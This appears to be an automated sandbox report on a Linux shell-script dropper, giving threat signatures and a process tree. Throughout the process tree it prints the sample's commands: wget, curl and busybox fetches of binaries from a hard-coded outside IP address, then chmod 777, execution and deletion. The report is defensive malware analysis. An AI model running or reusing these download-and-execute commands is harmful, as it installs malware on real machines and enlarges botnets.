Analysis Overview
SHA256
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583
Threat Level: Shows suspicious behavior
The file 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-25 01:20
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 01:20
Reported
2024-10-25 01:22
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
8s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
| N/A | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | N/A |
| N/A | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | N/A |
| N/A | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | N/A |
| N/A | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | N/A |
| N/A | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | N/A |
| N/A | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | N/A |
| N/A | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | N/A |
| N/A | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | N/A |
| N/A | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | N/A |
| N/A | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | N/A |
| N/A | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | N/A |
| N/A | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | N/A |
| N/A | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | N/A |
| N/A | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | N/A |
| N/A | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | N/A |
| N/A | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | N/A |
| N/A | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | N/A |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
| N/A | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | N/A |
| N/A | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | N/A |
| N/A | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | N/A |
| N/A | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | N/A |
| N/A | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | N/A |
| N/A | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | N/A |
| N/A | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | N/A |
| N/A | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | N/A |
| N/A | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /usr/bin/curl | N/A |
Processes
/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
[/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/chmod
[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/rm
[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/wget
[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/chmod
[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/rm
[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/chmod
[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/rm
[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/wget
[wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/chmod
[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/rm
[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/wget
[wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/chmod
[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/rm
[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/wget
[wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/chmod
[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/rm
[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/wget
[wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/chmod
[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/rm
[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/wget
[wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/chmod
[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/rm
[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/wget
[wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/chmod
[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/rm
[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/wget
[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/chmod
[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/rm
[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/wget
[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/chmod
[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/rm
[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/wget
[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/chmod
[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/rm
[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/wget
[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/chmod
[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/rm
[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/wget
[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/chmod
[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/rm
[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/wget
[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/chmod
[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/rm
[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/wget
[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/chmod
[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/rm
[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/wget
[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/chmod
[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/rm
[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/wget
[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/chmod
[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/rm
[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/wget
[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/chmod
[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/rm
[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/chmod
[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/rm
[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/wget
[wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/chmod
[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/rm
[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/wget
[wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/chmod
[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/rm
[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/wget
[wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/chmod
[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/rm
[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/wget
[wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/chmod
[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/rm
[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/wget
[wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/chmod
[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/rm
[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/wget
[wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/curl
